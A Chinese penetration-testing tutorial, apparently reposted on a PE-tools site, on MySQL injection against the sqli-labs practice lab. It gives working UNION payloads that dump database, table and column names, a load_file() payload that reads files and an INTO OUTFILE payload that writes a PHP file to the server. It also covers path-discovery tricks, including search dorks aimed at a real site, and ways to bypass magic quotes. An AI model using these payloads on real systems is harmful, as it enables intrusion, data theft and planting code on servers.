U盘PE| w764位旗舰版下载 | U盘装win7系统 | U盘启动 |win7pe | win10下载 |加入收藏土豆PE官网U盘PE,U盘装win7系统,win7pe,U盘启动,U盘装系统,w764位旗舰版下载站!
当前位置:主页 > 帮助中心 > 常见问题解答 >

(13)web安全|渗透测试|网络安全 注入/跨库查询/文件读写/常见的防护原理 详细

来源:http://www.tudoupe.com时间:2022-02-21

目录

高权限注入及低权限注入

跨库查询:

文件读写操作

流程:

找路径:

方法一:

方法二:

方法三:

方法四:

方法五:

方法六:

方法七:

知道路径后,再执行文件的读写操作

文件的写入:

可能遇到的问题:

问题一:

问题二:

问题三:

问题四:

写入:

常见的防护:

方法一:

方法二:

高权限注入及低权限注入

MySQL中分为:root(最高权限)、普通用户

数据库中可以有多个库,每个库有各自的表,每个表有各自的列

数据库---网站----数据库用户

一个数据库的普通用户只能操作自己的数据库

一个数据库的超级用户(root)不仅能操作自己用户,还能跨库操作其他数据库

information_schema 表特性,记录库名,表名,列名对应表

information_shema.schemata 所有库

information_schema.tables 所有表名

information_schema.columns 所有的列名

跨库查询:

less-2

获取所有数据库名:

?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata#

获取security(指定数据库)下所有表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'#

获取security(指定数据库)下emails(指定表)的所有列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='emails'#

获取emails表所有信息

文件读写操作

MySQL特有函数:

load_file():读取函数

into outfile 或 into dumpfile :导出函数

流程:

先找路径------再执行文件的读写操作

找路径:

方法一:

单引号爆出路径(报错显示)

错误参数值爆路径(报错显示)

现在很多错了都没有回显了

方法二:

通过搜索引擎获取(自我感觉效率低)

百度inurl:iqiyi.com warning

inurl:iqiyi.com"error"(或者“fatal error”)

方法三:

通过遗留的测试文件(扫描工具扫描)

/test .php

/ceshi .php

/info .php

/phpinfo .php

/php_info .php

/1 .php

/x .php

(上图来自百度)

方法四:

通过注入点来读取文件操作来读取搭建网站平台的配置文件来获取路径

方法五:

通过burpsuite、sqlmap等扫描工具扫 描得到网站的map

方法六:

漏洞报错,知道网站是用什么cms或者框架进行搭建的,用搜索引擎去找到对应的爆路径方式,比如phpcms 爆路径

方法七:

爆破:无任何突破点,就可以运用一些常见固定的可能安装位置生成字典,对目标网站进行爆破

eg:
windows:d:/www/root/xxx/
linux:/var/www/xxx

知道路径后,再执行文件的读写操作

我自己新建的一个hjh.txt文件

?id=-1 union%20select 1,2,load_file(%27D:/BaiduNetdiskDownload/phpstudy/phpstudy_pro/hjh.txt%27)

(%20是换行,%27是引号,有路径时,防止转义可以将改为\或者/)

文件的写入:

可能遇到的问题:

问题一:

魔术引号(magic_quotes_gpc = On)

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串,预定义字符有:
单引号(’)双引号(”)反斜杠()NULL

可以使用编码或宽字节绕过(附带网盘下载)

链接:https://pan.baidu.com/s/1cW_bMM3tMtNroEb-oMyPkw
提取码:hj12

问题二:

sqli-labs靶场无法写入问题解决“ it cannot execute this statement”和“You have an error in your SQL syntax”_黑色地带(崛起)的博客-CSDN博客

问题三:

MySQL出现“Lost connection to MySQL server during query”问题分析与解决_黑色地带(崛起)的博客-CSDN博客

问题四:

试错,并解决“ERROR : (2006, ‘MySQL server has gone away”“Lost connection to MySQL server during query”错误方法_黑色地带(崛起)的博客-CSDN博客

写入:

?id=-1 union select 1,'<?php phpinfo();?>',3 into outfile 'D:/BaiduNetdiskDownload/phpstudy/phpstudy_pro/hjh.php'--+

文件已经写入到指定位置了

常见的防护:

方法一:

用if判断语句进行过滤

方法二:

把传入的某些带有注入可能的词进行替换成其他指定词

Copyright © 2012-2014 Www.tudoupe.Com. 土豆启动 版权所有 意见建议:tdsky@tudoupe.com

土豆系统,土豆PE,win7系统下载,win7 64位旗舰版下载,u盘启动,u盘装系统,win10下载,win10正式版下载,win10 RTM正式版下载,win8下载,电脑蓝屏,IE11修复,网络受限,4K对齐,双系统,隐藏分区,系统安装不了,U盘装系统,笔记本装系统,台式机装系统,diskgenius运用,GHSOT装系统,U盘修复,U盘技巧,U盘速度,U盘不能格式化,U盘复制发生错误,U盘加密,U盘选购,开机黑屏,蓝屏,进不了系统,上不了网,打不开程序,点击无反应,系统设置,PE个性化,PE添加网络,PE维护系统

点击这里给我发消息